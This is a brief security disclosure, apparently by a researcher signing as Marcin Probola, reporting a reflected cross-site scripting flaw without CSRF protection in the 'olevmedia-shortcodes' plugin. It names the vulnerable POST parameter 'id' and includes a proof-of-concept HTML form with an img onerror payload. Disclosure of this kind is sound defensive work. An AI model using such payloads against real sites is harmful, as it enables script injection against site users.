Hello,
1. Reflected Cross-Site Scripting (XSS)
Authenticated users (like subscribers) can inject html/js code (there is no CSRF protection!).
Method: POST
Vulnerable parameters: id
Example PHP callstack:
omsc_popup_callback [/olevmedia-shortcodes/functions/interface.php:43]
Verification:
--
<input type="text" name="id" value='</script>"><img src=x onerror=alert(1) />' />
<input type="submit" name="submit" />
</form>
--
--
Regards,
Marcin Probola,